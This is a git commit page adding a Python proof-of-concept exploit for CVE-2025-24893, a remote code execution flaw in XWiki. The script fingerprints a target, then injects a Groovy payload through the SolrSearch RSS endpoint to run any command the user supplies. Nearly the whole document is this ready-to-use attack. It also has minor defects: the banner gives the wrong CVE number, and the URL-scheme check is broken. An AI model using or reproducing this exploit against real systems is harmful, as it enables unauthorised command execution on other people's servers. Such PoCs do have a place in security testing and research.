0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Reformat the repo to store all my PoCs and add CVE-2025-24893

Browse Source
This commit is contained in:
0xVoodoo
2025-08-18 13:56:34 -06:00
parent 14c0141694
commit 9788148d65
5 changed files with 179 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files
CVE-2025-24893/CVE-2025-24893.py
+59
View File
@@ -0,0 +1,59 @@
import requests
import argparse
import urllib.parse
# Pretty colors :)
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
RESET = "\033[0m"
def testVuln(target):
try:
resp = requests.get(target)
except requests.exceptions.RequestException as error:
print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
raise SystemExit(error)
if "xwiki" not in resp.text.lower():
print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
return False
else:
return True
def exploit(target, cmd):
payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}'
try:
print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
resp = requests.get(exploitUrl)
except requests.exceptions.RequestException as error:
print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
raise SystemExit(error)
print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
parser.add_argument('-c', '--command', required=True, help='Command to execute')
args = parser.parse_args()
print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
tgt = args.target.lower()
if tgt[4] != "http" and tgt[5] != "https":
print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
tgt = 'http://' + tgt
if testVuln(tgt):
exploit(tgt, args.command)
else:
raise SystemExit()